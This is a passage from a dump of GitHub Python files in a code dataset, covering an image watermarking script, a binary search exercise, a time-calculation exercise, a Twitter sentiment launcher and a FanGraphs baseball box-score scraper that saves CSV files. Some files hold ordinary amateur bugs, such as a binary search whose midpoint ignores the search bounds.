\n \ndef round_corners(original_image, percent_of_side):\n \"\"\" Rounds the corner of a PIL.Image\n \n original_image must be a PIL.Image\n Returns a new PIL.Image with rounded corners, where\n 0 < percent_of_side < 1\n is the corner radius as a portion of the shorter dimension of original_image\n \"\"\"\n #set the radius of the rounded corners\n width, height = original_image.size\n radius = int(percent_of_side * min(width, height)) # radius in pixels\n \n ###\n #create a mask\n ###\n \n #start with transparent mask\n rounded_mask = PIL.Image.new('RGBA', (width, height), (127,0,127,0))\n drawing_layer = ImageDraw.Draw(rounded_mask)\n \n # Overwrite the RGBA values with A=255.\n # The 127 for RGB values was used merely for visualizing the mask\n \n # Draw one rectangles to fill interior with opaqueness\n drawing_layer.polygon([(radius-75,25),(width-radius+75,25),\n (width-radius+75,height-25),(radius-75,height-25)],\n fill=(127,0,127,255))\n\n \n # Uncomment the following line to show the mask\n # plt.imshow(rounded_mask)\n \n # Make the new image, starting with all transparent\n result = PIL.Image.new('RGBA', original_image.size, (255,255,255,255))\n result.paste(original_image, (0,0), mask=rounded_mask)\n return result\n \n \ndef get_images(directory=None):\n ''' Returns PIL.Image objects for all the images in directory.\n\n If directory is not specified, uses current directory.\n Returns a 2-tuple containing \n a list with a PIL.Image object for each image file in root_directory, \n and a list with a string filename for each image file in root_directory\n '''\n\n if directory == None:\n directory = os.getcwd() # Use working directory if unspecified\n\n image_list=[] # Initialize aggregators\n file_list = []\n\n directory_list = os.listdir(directory) # Get list of files\n for entry in directory_list:\n absolute_filename = os.path.join(directory, entry)\n try:\n image = PIL.Image.open(absolute_filename)\n file_list += [entry]\n image_list += [image]\n except IOError:\n pass # do nothing with errors tying to open non-images\n return image_list, file_list\n \n \ndef watermark(allFunctions = False, directory = None):\n '''Inserts a watermark into the image.\n Takes an boolean argument of if you are going through all the functions'''\n print (directory)\n watermark = PIL.Image.open(os.path.join(os.getcwd(), 'NuamesLogo.png'))\n directory = os.path.join(os.getcwd(), 'modified')\n try:\n os.mkdir(os.path.join(os.getcwd(), 'modified'))\n except OSError:\n pass # if the directory already exists, proceed \n \n print(directory)\n image_list, file_list = get_images(directory) \n for n in range(len(image_list)):\n # Parse the filename\n modifiedImage = image_list[n]\n \n filename, filetype = os.path.splitext(file_list[n])\n \n width, height = modifiedImage.size\n \n #Resize the watermark to a fourth of the image size\n watermark_small = watermark.resize((width/4, height/4))\n \n try:\n modifiedImage.paste(watermark_small, (20,20), mask=watermark_small)\n \n modifiedImage_filename = os.path.join(directory,filename + '.png')\n \n modifiedImage.save(modifiedImage_filename)\n except KeyError:\n pass","repo_name":"supershesh/1.4.7Family","sub_path":"FamilyPictureModifier.py","file_name":"FamilyPictureModifier.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1917743169","text":"arr = [1, 2, 3, 5, 6, 7, 8, 9, 10, 11]\n\n# 핵심로직\n# 중간 인덱스 값 찾기\n# 무조건 정렬하고 찾아야함\n\n\ndef binarySearch(arr, targetNum):\n\n start = 0\n end = len(arr) - 1 # 인덱스는 0부터 시\n\n while start <= end: # start와 end가 같을때까지?\n midIndex = len(arr) // 2 # // 연산자로 소수점이 나올 확률 제거\n midValue = arr[midIndex]\n\n if midValue == targetNum:\n return midIndex\n elif midValue < targetNum:\n start = midIndex + 1\n else:\n end = midIndex - 1\n\n return -1 # 찾지 못하느 경우\n\n\nprint(binarySearch(arr, 7))\n","repo_name":"sangyunpark99/Baekjoon_Algorithm","sub_path":"헤이밥/알고리즘기본개념/이진탐색.py","file_name":"이진탐색.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18612601579","text":"\"\"\"\n10) Uma máquina demora 17 segundos para produzir uma peça. Faça um programa que leia a quantidade de \npeças que devem ser produzidas e mostre o tempo em horas, minutos e segundos necessários para produzir \nessa quantidade de peças. Por exemplo, se um operador deseja produzir 4 peças, a máquina gastaria 68 \nsegundos. Nesse caso, o programa daria como resposta: 0 horas, 1 minuto e 8 segundos. Em sua resposta, \nindique somente os números, separados por um único espaço entre eles. Por exemplo: 0 1 8. \n\"\"\"\nnpeca = int(input(\"Digite o número de peças que deseja produzir: \"))\n\ntempo_peca = 17 # Tempo em segundos para produzir uma peça\n\ntempo_total_segundos = npeca * tempo_peca\nhoras = tempo_total_segundos // 3600\nminutos = (tempo_total_segundos % 3600) // 60\nsegundos = tempo_total_segundos % 60\n\nprint(f\"{horas} {minutos} {segundos}\")\n","repo_name":"vkendis/UNIFEI-SIN","sub_path":"Python/003_Lista_intro/Ex_010.py","file_name":"Ex_010.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18716793255","text":"import argparse \nfrom api import start_stream\n\n# args\nparser = argparse.ArgumentParser()\nparser.add_argument('topic', help='a twitter trend you\\'d like to analyze')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n start_stream(args.topic)","repo_name":"danielgrijalva/sentiment-analysis","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33485560466","text":"import pandas as pd\r\nimport requests\r\nimport urllib\r\nimport numpy as np\r\n\r\nimport os.path\r\nfrom os import path\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom datetime import datetime\r\nfrom datetime import timedelta\r\n\r\nimport time\r\nimport random\r\n\r\nfrom tqdm import tqdm\r\n\r\nimport sys \r\n\r\n\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\n\r\n#General functions\r\n\r\n#Function to produce unique match IDs\r\ndef numerise_string(x):\r\n\r\n\talphabet = \"abcdefghijklmnopqrstuvwxyz\"\r\n\ttag = \"\"\r\n\r\n\tfor letters in x:\r\n\t\ttag = tag + str(alphabet.find(letters.lower()))\r\n\r\n\treturn tag\r\n\r\n\r\n#Custom append function used for auto-save purposes\r\ndef update_frame(data, new_data):\r\n\r\n\tif len(data) == 0:\r\n\t\treturn new_data\r\n\telse:\r\n\t\treturn data.append(new_data)\r\n\r\n\r\n\r\n\r\ndef string_to_array(x):\r\n\r\n\t\tdummy = \"abcdefghijklmnopqrstuvwxyz\"\r\n\t\talphabet = []\r\n\t\tfor letters in dummy:\r\n\t\t\talphabet.append(letters)\t\r\n\t\talphabet = np.array(alphabet)\t\t\r\n\r\n\t\tarr = []\r\n\r\n\t\tfor letters in x.lower():\r\n\t\t\tarr.append(np.where(alphabet == letters)[0][0])\t\r\n\r\n\t\treturn np.array(arr)\r\n\r\n\r\ndef match_two_names(x, y):\r\n\r\n\tx_arr = string_to_array(x)\r\n\ty_arr = string_to_array(y)\r\n\r\n\tn = len(x_arr)\r\n\tm = len(y_arr)\r\n\tn_try = m - n + 1\r\n\r\n\tif n_try > 0:\r\n\t\tmatch_p = []\r\n\r\n\t\tfor i in range(0, n_try):\r\n\t\t\tv = x_arr - y_arr[0:n]\r\n\t\t\tmatch_p.append(len(np.where(v == 0)[0]) / n)\r\n\t\t\ty_arr = y_arr[1:]\r\n\r\n\r\n\r\n\r\n\r\nclass Baseball_Scrapper:\r\n\r\n\tdef __init__(self, file_path):\r\n\r\n\t\tself.file_path = file_path\r\n\t\tdir_path = file_path + \"/MLB_Modeling\"\r\n\r\n\t\t#Create the repositories if they do not exist\r\n\t\t#Main repo\r\n\t\ttarget = file_path + \"/MLB_Modeling\"\r\n\t\tif not path.exists(target):\r\n\t\t\tos.mkdir(target)\r\n\t\t\tprint(\"Main directory created at:\" + \"\\t\" + target)\r\n\r\n\t\t#Sub-repo\r\n\t\tsub_directories = [\"Bat\", \"Pitch\", \"Scores\", \"Betting\", \"Misc\"]\r\n\t\tfor element in sub_directories:\r\n\r\n\t\t\ttarget = dir_path + \"/\" + element\r\n\t\t\tif not path.exists(target):\r\n\t\t\t\tos.mkdir(target)\r\n\t\t\t\tprint(\"Sub-directory created at:\" + \"\\t\" + target)\r\n\r\n\r\n\t\t#Sub-repo locations\r\n\t\tself.paths = []\r\n\t\tfor element in sub_directories:\r\n\t\t\tself.paths.append(dir_path + \"/\" + element)\r\n\r\n\r\n\t\tdictio_path = self.paths[4] + \"/Abreviations_Dictionary.csv\"\r\n\t\tif path.exists(dictio_path):\r\n\t\t\tself.dictio = pd.read_csv(dictio_path)\r\n\t\telse:\r\n\t\t\tself.dictio = []\r\n\r\n\r\n\t\tprint(\"Scapper succesfully initiated.\")\r\n\r\n\r\n\t#Updates a file, or save it if it doesn't exists\r\n\tdef update_file(self, save_path, file_name, data):\r\n\r\n\t\tfinal_path = save_path + \"/\" + file_name\r\n\r\n\t\ttry:\r\n\t\t\tif not path.exists(final_path):\r\n\t\t\t\tif len(data) > 0:\r\n\t\t\t\t\tdata.to_csv(final_path, index = False)\r\n\r\n\t\t\telse:\r\n\t\t\t\tif len(data) > 0:\r\n\t\t\t\t\tpd.read_csv(final_path).append(data).drop_duplicates().to_csv(final_path, index = False)\r\n\r\n\t\texcept:\r\n\t\t\tprint(\"Failed to update file.\")\t\r\n\r\n\r\n\r\n\t#Translates a team name to its city name\r\n\tdef Translate_Team_Names(self, value, want):\r\n\r\n\t\tif len(self.dictio) == 0:\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + self.paths[4] + \"Abreviations_Dictionary.csv\")\r\n\t\telse:\r\n\t\t\tx = self.dictio\r\n\r\n\t\tm = len(x.columns)\r\n\r\n\r\n\t\tfor j in range(0, m):\r\n\t\t\tlocation = np.where(x.iloc[:, j] == value)[0]\r\n\r\n\t\t\tif len(location) > 0:\r\n\t\t\t\treturn x.at[location[0], want]\r\n\r\n\r\n\t#Frame-wide translate\r\n\tdef Fix_Team_Names(self, frame, want):\r\n\r\n\t\tfor col in frame.columns:\r\n\r\n\t\t\tif \"Team\" in col or \"Opponent\" in col:\r\n\r\n\t\t\t\tvector = np.array(list(frame[col]))\r\n\t\t\t\tvalues = np.array(list(set(vector)))\r\n\r\n\t\t\t\tm = np.where(frame.columns == col)[0][0]\r\n\r\n\t\t\t\tfor team in values:\r\n\r\n\t\t\t\t\tindex = np.where(vector == team)[0]\r\n\t\t\t\t\tproper_name = self.Translate_Team_Names(team, want)\r\n\t\t\t\t\t\r\n\t\t\t\t\tframe.iloc[index, m] = proper_name\r\n\r\n\t\treturn frame\r\n\r\n\r\n\r\n\r\n\t###########################################################\r\n\t###########################################################\r\n\t######################## WORK FLOW ########################\r\n\t###########################################################\r\n\t###########################################################\r\n\r\n\r\n\t###########################################################\r\n\t#################### WEB SCRAPPING ########################\r\n\t###########################################################\r\n\r\n\r\n\t#Attempts to extract game URLs from a certain date\r\n\t#Is used inside a loop\r\n\tdef Scrape_FanGraphs_game_url(self, date):\r\n\r\n\t\turl = \"https://www.fangraphs.com/scoreboard.aspx?date=\" + date\r\n\r\n\t\thtml = requests.get(url).content\r\n\t\thtml_content = BeautifulSoup(html, 'lxml')\r\n\r\n\t\tlinks = html_content.findAll('a')\r\n\t\tgame_url = []\r\n\r\n\t\tfor link in links:\r\n\t\t\ttry:\r\n\t\t\t\thref = link.attrs['href']\r\n\t\t\texcept:\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tif \"boxscore\" in href:\r\n\t\t\t\tgame_url.append(\"https://www.fangraphs.com/\" + href)\r\n\r\n\t\treturn game_url\r\n\r\n\r\n\t#Scrapes FanGraphs.com for urls to games that were played between to dates (frm, to)\r\n\t#Is used to initiate the database\r\n\t#Once done, the UPDATE_FanGraphs_Box_Scores method should be used\r\n\tdef Get_FanGraphs_Game_URLs(self, frm, to):\r\n\r\n\t\tbegin = datetime.strptime(frm, \"%Y-%m-%d\")\r\n\t\tend = datetime.strptime(to, \"%Y-%m-%d\")\r\n\r\n\t\tn = (end - begin).days + 1\r\n\r\n\t\turls = pd.DataFrame(columns = [\"URL\"])\r\n\t\tno_games_dates = pd.DataFrame(columns = [\"Dates\"])\r\n\t\tgames_dates = pd.DataFrame(columns = [\"Dates\"])\r\n\r\n\r\n\t\t#Check for dates which links were already scrapped\r\n\t\tif path.exists(self.paths[-1] + \"/Game_Dates.csv\"):\r\n\t\t\tdates_done = list(pd.read_csv(self.paths[-1] + \"/Game_Dates.csv\")[\"Dates\"])\r\n\t\telse:\r\n\t\t\tdates_done = []\r\n\r\n\t\t#Main loop (extraction + auto-save)\r\n\t\tfor i in tqdm(range(0, n)):\r\n\r\n\t\t\tdate = datetime.strftime(begin, \"%Y-%m-%d\")\r\n\r\n\t\t\t#Avoid extracting for certain cases\r\n\t\t\tif (begin.month < 3) or (begin.month > 10) or (date in dates_done):\r\n\t\t\t\tbegin = begin + timedelta(days = 1)\r\n\t\t\t\tcontinue\r\n\r\n\t\t\t#Retrieve links\r\n\t\t\ttry:\r\n\t\t\t\ttodays_url = self.Scrape_FanGraphs_game_url(date)\r\n\t\t\texcept:\r\n\t\t\t\tno_games_dates = no_games_dates.append(pd.DataFrame(date, columns = [\"Dates\"]))\r\n\t\t\t\tbegin = begin + timedelta(days = 1)\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tif len(todays_url) > 0:\r\n\t\t\t\turls = urls.append(pd.DataFrame(todays_url, columns = [\"URL\"]))\r\n\t\t\t\tgames_dates = games_dates.append(pd.DataFrame([date], columns = [\"Dates\"])) \r\n\r\n\t\t\t\tprint(\"Scrapped:\" + \"\\t\" + date)\r\n\r\n\r\n\t\t\t#Saving procedure (trigerred every 20 iterations)\r\n\t\t\tif (i + 1) % 20 == 0 or begin == end:\r\n\r\n\t\t\t\tself.update_file(self.paths[-1], \"Game_URLs.csv\", urls)\r\n\t\t\t\turls = pd.DataFrame(columns = [\"URL\"])\r\n\r\n\t\t\t\tself.update_file(self.paths[-1], \"No_Game_Dates.csv\", no_games_dates)\r\n\t\t\t\tno_games_dates = pd.DataFrame(columns = [\"Dates\"])\r\n\r\n\t\t\t\tself.update_file(self.paths[-1], \"Game_Dates.csv\", games_dates)\r\n\t\t\t\tgames_dates = pd.DataFrame(columns = [\"Dates\"])\t\t\t\r\n\r\n\t\t\t\tprint(\"Saved data.\")\r\n\r\n\r\n\t\t\tbegin = begin + timedelta(days = 1)\r\n\t\t\ttime.sleep(random.randint(5, 10))\r\n\r\n\t\tprint(\"Done.\")\r\n\r\n\r\n\r\n\t#Get the Box Scores data based off a URL \r\n\tdef Scrape_FanGraphs_game_stats_by_url(self, ulr):\r\n\r\n\t\thtml = requests.get(url).content\r\n\t\ttables = pd.read_html(html)\r\n\r\n\t\t#Date and team names\r\n\t\turl_split = url.split(\"-\")\r\n\t\tdate = url_split[0].split(\"=\")[-1] + \"-\" + url_split[1] + \"-\" + url_split[2].split(\"&\")[0]\r\n\r\n\t\tdate_index = -1\r\n\t\tfor table in tables:\r\n\t\t\tdate_index += 1\r\n\t\t\tif table.iloc[0,0] == \"Team\":\r\n\t\t\t\tbreak\t\r\n\r\n\t\thome_team = tables[date_index].iloc[2, 0]\r\n\t\taway_team = tables[date_index].iloc[1, 0]\t\r\n\r\n\t\t#Score\r\n\t\thome_score = tables[date_index].iloc[2, -1]\r\n\t\taway_score = tables[date_index].iloc[1, -1]\r\n\r\n\t\tID = \"\"\r\n\t\ttemp = date.split(\"-\")\r\n\t\tfor values in temp:\r\n\t\t\tID = ID + values\r\n\r\n\t\tID = ID + numerise_string(home_team[0:2] + away_team[0:2])\r\n\r\n\t\tscores = pd.DataFrame(columns = [\"Home\", \"Home_Score\", \"Away\", \"Away_Score\", \"Date\", \"URL\", \"ID\"])\r\n\t\tscores.loc[0] = [home_team, home_score, away_team, away_score, date, url, ID]\r\n\r\n\r\n\t\t#Find where the extraction should begin\r\n\t\tstart = 0\r\n\t\tfor table in tables:\r\n\t\t\tstart += 1\r\n\t\t\tif str(type(table.columns)) == \"\":\r\n\t\t\t\tbreak\r\n\r\n\t\ttables = tables[start:]\r\n\r\n\t\t#Find the play by play table\r\n\t\ttable_lengths = []\r\n\t\tfor table in tables:\r\n\t\t\ttable_lengths.append(len(table))\r\n\r\n\t\ttable_lengths = np.array(table_lengths)\r\n\r\n\t\tplay_by_play_index = np.where(table_lengths == np.max(table_lengths))[0][0]\r\n\t\tplay_by_play = tables[play_by_play_index]\r\n\t\tdel tables[play_by_play_index]\r\n\t\ttable_lengths = np.delete(table_lengths, play_by_play_index)\r\n\r\n\t\t#Merge the frames\r\n\t\tmerged_tables = []\r\n\t\tfor i in range(0, 4):\r\n\r\n\t\t\ttemp_table = tables[i]\r\n\t\t\tfor j in range(4, len(tables)):\r\n\r\n\t\t\t\tsize = len(temp_table)\r\n\r\n\t\t\t\tif len(tables[j]) == size:\r\n\r\n\t\t\t\t\tcheck = len(np.where(tables[i][\"Name\"] == tables[j][\"Name\"])[0])\r\n\t\t\t\t\tif check == size:\r\n\r\n\t\t\t\t\t\ttemp_table = pd.merge(temp_table, tables[j], on = \"Name\")\r\n\r\n\t\t\ttemp_table[\"Date\"] = date\r\n\t\t\tif i % 2 == 0:\r\n\t\t\t\ttemp_table[\"Team\"] = home_team\r\n\t\t\t\ttemp_table[\"Location\"] = \"Home\"\r\n\t\t\t\ttemp_table[\"Opponent\"] = away_team\r\n\t\t\telse:\r\n\t\t\t\ttemp_table[\"Team\"] = away_team\r\n\t\t\t\ttemp_table[\"Location\"] = \"Away\"\r\n\t\t\t\ttemp_table[\"Opponent\"] = home_team\r\n\r\n\t\t\tcolnames = []\r\n\t\t\tfor j in range(0, len(temp_table.columns)):\r\n\t\t\t\tcolnames.append(temp_table.columns[j].split(\"_\")[0])\r\n\r\n\t\t\ttemp_table.columns = colnames\r\n\t\t\ttemp_table[\"ID\"] = ID\r\n\r\n\t\t\tmerged_tables.append(temp_table.loc[:,~temp_table.columns.duplicated()])\r\n\r\n\r\n\r\n\r\n\t\tmerged_tables.append(scores)\r\n\r\n\t\treturn merged_tables\r\n\r\n\r\n\r\n\t#Extracts the box scores based off the URL list\r\n\tdef Extract_FanGraphs_Box_Scores(self):\r\n\r\n\t\turl_path = self.paths[-1] + \"/Game_URLs.csv\"\r\n\t\tif path.exists(url_path):\r\n\r\n\t\t\turls = list(set(list(pd.read_csv(url_path)[\"URL\"])))\r\n\r\n\r\n\t\t\t#Checks for existing Box_Scores\r\n\t\t\tpath_to_check = self.paths[2] + \"/FanGraphs_Scores.csv\"\r\n\t\t\tif path.exists(path_to_check):\r\n\t\t\t\turls_done = list(pd.read_csv(path_to_check).drop_duplicates()[\"URL\"])\r\n\r\n\t\t\t\turls = [x for x in urls if x not in urls_done]\r\n\r\n\r\n\t\t\t#Initialise variables\r\n\r\n\t\t\tbat = []\r\n\t\t\tpitch = []\r\n\t\t\tscores = []\r\n\r\n\t\t\tcount = 0\r\n\t\t\tn = len(urls)\r\n\r\n\t\t\tprint(\"Extracting \" + str(n) + \" Box Scores...\")\r\n\t\t\t#e_time = round((((45/2) + 3) * n) / 60, 2)\r\n\t\t\t#print(\"Estimated running time:\" + \"\\t\" + str(e_time) + \" minutes\")\r\n\r\n\t\t\t#Loop throught URLs \r\n\t\t\tfor i in tqdm(range(0, n)):\r\n\r\n\t\t\t\turl = str(urls[i])\r\n\t\t\t\tcount += 1\r\n\t\t\t\ttry:\r\n\t\t\t\t\ttables = self.Scrape_FanGraphs_game_stats_by_url(url)\r\n\t\t\t\texcept:\r\n\t\t\t\t\ttime.sleep(random.randint(5,10))\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\tbat = update_frame(bat, tables[0].append(tables[1]))\r\n\t\t\t\tpitch = update_frame(pitch, tables[2].append(tables[3]))\r\n\t\t\t\tscores = update_frame(scores, tables[4])\r\n\r\n\t\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** ADDED GAME *****\")\r\n\t\t\t\tprint(scores.iloc[-1,:])\r\n\r\n\t\t\t\t#print(scores)\r\n\r\n\t\t\t\tif (count + 1) % 20 == 0 or url == urls[-1]:\r\n\r\n\t\t\t\t\tself.update_file(self.paths[0], \"FanGraphs_Box_Scores.csv\", bat)\t\r\n\t\t\t\t\tbat = []\r\n\r\n\t\t\t\t\tself.update_file(self.paths[1], \"FanGraphs_Box_Scores.csv\", pitch)\t\r\n\t\t\t\t\tpitch = []\t\t\t\t\t\r\n\r\n\t\t\t\t\tself.update_file(self.paths[2], \"FanGraphs_Scores.csv\", scores)\t\r\n\t\t\t\t\tscores = []\r\n\r\n\t\t\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** PROGRESS SAVED *****\")\r\n\r\n\t\t\t\tif url != urls[-1]:\r\n\t\t\t\t\ttime.sleep(random.randint(3, 7))\r\n\r\n\r\n\r\n\r\n\t###########################################################\r\n\t#################### UPDATE CODES ########################\r\n\t###########################################################\r\n\r\n\r\n\t#MAIN FUNCTION\r\n\t#Scrapes within the interval [last_scrapped, today]\r\n\t#Update the Box_Scores\r\n\t#Clean the data if needed\r\n\tdef UPDATE_FanGraphs_Box_Scores(self):\r\n\r\n\t\tpath_check = self.paths[2] + \"/FanGraphs_Scores.csv\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_check)\r\n\r\n\t\ttemp = pd.read_csv(path_check)\r\n\t\tn = len(temp)\r\n\r\n\t\tfrm = temp[\"Date\"].max()\r\n\t\tto = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\r\n\t\tself.Get_FanGraphs_Game_URLs(frm, to)\r\n\t\tself.Extract_FanGraphs_Box_Scores()\r\n\r\n\t\tn_new = len(pd.read_csv(path_check))\r\n\t\tif n_new > n:\r\n\t\t\tself.Clean_Data()\r\n\t\telse:\r\n\t\t\tprint(\"No new Box Scores to scrape.\")\r\n\r\n\r\n\r\n\t#Extracts the box scores based off the URL list\r\n\tdef Extract_FanGraphs_Box_Scores_FROM_MISSING_MATCHES(self):\r\n\r\n\t\turl_path = self.paths[-1] + \"/Missing_Matches.csv\"\r\n\t\tif path.exists(url_path):\r\n\r\n\t\t\tfile_missing_urls = pd.read_csv(url_path)\r\n\r\n\t\t\turls = list(set(list(file_missing_urls[\"URL\"])))\r\n\r\n\t\t\t#Checks for existing Box_Scores\r\n\t\t\tpath_to_check = self.paths[2] + \"/FanGraphs_Scores.csv\"\r\n\t\t\tif path.exists(path_to_check):\r\n\t\t\t\turls_done = list(pd.read_csv(path_to_check).drop_duplicates()[\"URL\"])\r\n\r\n\t\t\t\turls = [x for x in urls if x not in urls_done]\r\n\r\n\r\n\t\t\t#Initialise variables\r\n\r\n\t\t\tbat = []\r\n\t\t\tpitch = []\r\n\t\t\tscores = []\r\n\r\n\t\t\tcount = 0\r\n\t\t\tn = len(urls)\r\n\r\n\t\t\tprint(\"Extracting \" + str(n) + \" Box Scores...\")\r\n\t\t\t#e_time = round((((45/2) + 3) * n) / 60, 2)\r\n\t\t\t#print(\"Estimated running time:\" + \"\\t\" + str(e_time) + \" minutes\")\r\n\r\n\t\t\t#Loop throught URLs \r\n\t\t\tfor i in tqdm(range(0, n)):\r\n\r\n\t\t\t\turl = str(urls[i])\r\n\t\t\t\tcount += 1\r\n\t\t\t\ttry:\r\n\t\t\t\t\ttables = self.Scrape_FanGraphs_game_stats_by_url(url)\r\n\t\t\t\texcept:\r\n\t\t\t\t\ttime.sleep(random.randint(5,10))\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\tbat = update_frame(bat, tables[0].append(tables[1]))\r\n\t\t\t\tpitch = update_frame(pitch, tables[2].append(tables[3]))\r\n\t\t\t\tscores = update_frame(scores, tables[4])\r\n\r\n\t\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** ADDED GAME *****\")\r\n\t\t\t\tprint(scores.iloc[-1,:])\r\n\r\n\t\t\t\t#print(scores)\r\n\r\n\t\t\t\tif count % 20 == 0 or url == urls[-1]:\r\n\r\n\t\t\t\t\tself.update_file(self.paths[0], \"FanGraphs_Box_Scores.csv\", bat)\t\r\n\t\t\t\t\tbat = []\r\n\r\n\t\t\t\t\tself.update_file(self.paths[1], \"FanGraphs_Box_Scores.csv\", pitch)\t\r\n\t\t\t\t\tpitch = []\t\t\t\t\t\r\n\r\n\t\t\t\t\tself.update_file(self.paths[2], \"FanGraphs_Scores.csv\", scores)\t\r\n\t\t\t\t\tscores = []\r\n\r\n\t\t\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** PROGRESS SAVED *****\")\r\n\r\n\t\t\t\tif url != urls[-1]:\r\n\t\t\t\t\ttime.sleep(random.randint(3, 7))\r\n\r\n\r\n\t###########################################################\r\n\t#################### DATA CLEANING #######################\r\n\t###########################################################\r\n\r\n\t#Cleans the bat, pitch and scores frames\r\n\tdef Clean_Data(self):\r\n\r\n\t\t#Create sub-repositories if they do not already exist\r\n\t\tsufix = \"/Clean_Data\"\r\n\r\n\t\tfor i in range(0, (len(self.paths) - 1)):\r\n\t\t\tpath_string = self.paths[i] + sufix\r\n\t\t\tif not path.exists(path_string):\r\n\t\t\t\tos.mkdir(path_string)\r\n\t\t\t\tprint(\"Create sub-directory at:\" + \"\\t\" + path_string)\r\n\r\n\t\tscores_path = self.paths[2] + \"/FanGraphs_Scores.csv\"\r\n\t\tif not path.exists(scores_path):\r\n\t\t\tsys.exit(\"No data to clean.\")\r\n\t\telse:\r\n\t\t\tscores = pd.read_csv(scores_path)\r\n\r\n\t\tscores.columns = [\"Team_Home\", \"Score_Home\", \"Team_Away\", \"Score_Away\", \"Date\", \"URL\", \"ID\"]\r\n\r\n\t\t#Load bat and pitch frames\r\n\t\tframes = []\r\n\t\tfor i in range(0,2):\r\n\r\n\t\t\tpath_string = self.paths[i] + \"/FanGraphs_Box_Scores.csv\"\r\n\t\t\tif not path.exists(path_string):\r\n\t\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_string)\r\n\t\t\telse:\r\n\t\t\t\tframes.append(pd.read_csv(path_string, dtype={'a': str})) \r\n\r\n\r\n\t\t#Use CITY abreviations for TEAMS\r\n\t\tscores = self.Fix_Team_Names(scores, \"City\")\r\n\t\tfor i in range(0,2):\r\n\t\t\tframes[i] = self.Fix_Team_Names(frames[i], \"City\")\r\n\r\n\r\n\t\t#Find double-matches days\r\n\t\tIDs = np.array(list(scores[\"ID\"]))\r\n\t\tdoubles = [x for x in IDs if len(np.where(IDs == x)[0]) > 1]\r\n\r\n\t\tif len(doubles) > 0:\r\n\r\n\t\t\tfix = list(set(list(doubles)))\r\n\r\n\t\t\tm = np.where(scores.columns == \"ID\")[0][0]\r\n\r\n\t\t\tfor values in fix:\r\n\r\n\t\t\t\tindex_scores = np.where(IDs == values)[0][1]\r\n\r\n\t\t\t\tfor i in range(0, 2):\r\n\r\n\t\t\t\t\tindex = np.where(frames[i][\"ID\"] == values)[0]\r\n\t\t\t\t\ttemp_names = frames[i].iloc[index, :][\"Name\"]\r\n\r\n\t\t\t\t\tsplit = np.where(temp_names == \"Total\")[0][1] + 1\r\n\t\t\t\t\tto_replace = index[split:]\r\n\r\n\t\t\t\t\tcol_index = np.where(frames[i].columns == \"ID\")[0][0]\r\n\r\n\t\t\t\t\tframes[i].iloc[to_replace, col_index] = -values\r\n\r\n\r\n\t\t\t\tscores.iloc[index_scores, m] = -values\r\n\r\n\r\n\t\t#Tag starting pitchers\r\n\t\tframes[1][\"Starting\"] = \"No\"\r\n\t\tIDs = list(scores[\"ID\"])\r\n\t\tfor i in tqdm(range(0, len(IDs))):\r\n\r\n\t\t\tID = IDs[i]\r\n\t\t\tindex_match = np.where(frames[1][\"ID\"] == ID)[0]\r\n\t\t\tif len(index_match) == 0:\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tteams = list(set(list(frames[1][\"Team\"][index_match])))\r\n\t\t\tfor team in teams:\r\n\t\t\t\tstarting = index_match[np.where(frames[1][\"Team\"][index_match] == team)[0][0]]\r\n\t\t\t\tframes[1].at[starting, \"Starting\"] = \"Yes\"\r\n\r\n\r\n\r\n\t\tfor i in range(0, 2):\r\n\r\n\t\t\tx = frames[i]\r\n\r\n\t\t\t#Remove \"Total\" rows\r\n\t\t\trmv = np.where(x[\"Name\"] == \"Total\")[0]\r\n\t\t\tx = x.drop(rmv).reset_index(drop = True)\r\n\r\n\r\n\t\t\t#The are NaNs due to ratios\r\n\t\t\t#Create dummy columns for NaNs\r\n\r\n\t\t\tn_NaNs = x.isna().sum()\r\n\t\t\tfix = np.where(n_NaNs > 0)[0]\r\n\t\t\tcols_to_fix = x.columns[fix]\r\n\r\n\t\t\tif len(fix) > 0:\r\n\t\t\t\tfor cnames in cols_to_fix:\r\n\r\n\t\t\t\t\t#Replace with 0\r\n\t\t\t\t\tcol_index = np.where(x.columns == cnames)[0][0]\r\n\t\t\t\t\tto_replace = np.where(x[cnames].isna())[0]\r\n\r\n\t\t\t\t\tif \"%\" in cnames or cnames == \"HR/FB\":\r\n\t\t\t\t\t\tx.iloc[to_replace, col_index] = \"0.0%\"\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tif x[cnames].dtype == np.float64:\r\n\t\t\t\t\t\t\tx.iloc[to_replace, col_index] = 0.0\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tx.iloc[to_replace, col_index] = 0\r\n\r\n\t\t\t\t\t#Add dummy column\r\n\t\t\t\t\tnew_name = cnames + \"_NaN\"\r\n\t\t\t\t\tx[new_name] = 0\r\n\r\n\t\t\t\t\tcol_index = np.where(x.columns == new_name)[0][0]\r\n\t\t\t\t\tx.iloc[to_replace, col_index] = 1\r\n\r\n\r\n\t\t\t#Format percentages\r\n\t\t\tdata_types = list(x.dtypes)\r\n\t\t\tfor j in range(0, 